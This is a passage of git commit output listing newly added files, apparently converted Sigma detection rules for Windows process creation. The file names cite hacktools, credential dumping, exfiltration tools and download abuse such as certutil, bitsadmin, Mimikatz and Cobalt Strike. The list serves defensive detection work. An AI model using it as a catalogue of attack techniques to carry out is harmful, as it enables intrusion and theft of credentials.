tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bash_command_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bash_file_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_load_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_decode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_clip_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_del_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmdkey_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_control_panel_item.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csc_susp_parent.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csi_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_csvde_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_cookie_hijacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_custom_user_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_insecure_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_local_file_read.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_curl_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_devinit_lolbin_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dirlister_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_child_process_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dllhost_no_cli_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dns_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dnscmd_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_driverquery_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_driverquery_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsacls_abuse_permissions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsacls_password_spray.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsim_remove.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dtrace_kernel_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dumpminitool_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_dumpminitool_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_params.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_esentutl_webcache.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_eventvwr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_expand_cabinet_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_break_process_tree.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_explorer_nouaccheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_gpp_passwords.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_lnk.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_lsass.yml create 
mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_recon_everyone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_recon_pipe_output.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_finger_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_fsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_git_susp_clone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gpresult_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_chm_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hh_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_certify.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_certipy.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_covenant.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_dinjector.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_gmer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_hashcat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_hydra.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_impersonate.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_inveigh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_koadic.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_localpotato.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_pchunter.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_powertool.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpersist.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sharpview.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_stracciatella_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_sysmoneop.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_trufflesnout.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_uacme.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_wce.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_winpeas.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_xordump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hktl_zipexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hostname_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_hwp_exploits.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_icacls_deny.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ieexec_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_http_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_connection_strings_decryption.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_iis_susp_module_registration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_imewbdld_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_installutil_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_instalutil_no_log_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_keytool_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_java_susp_child_process_2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_kd_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ksetup_password_change_computer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ksetup_password_change_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ldifde_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ldifde_file_load.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_logman_disable_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_cdb.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_cmdl32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_customshellhost.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_defaultpack.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_diantz_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dnx.yml create mode 100644 
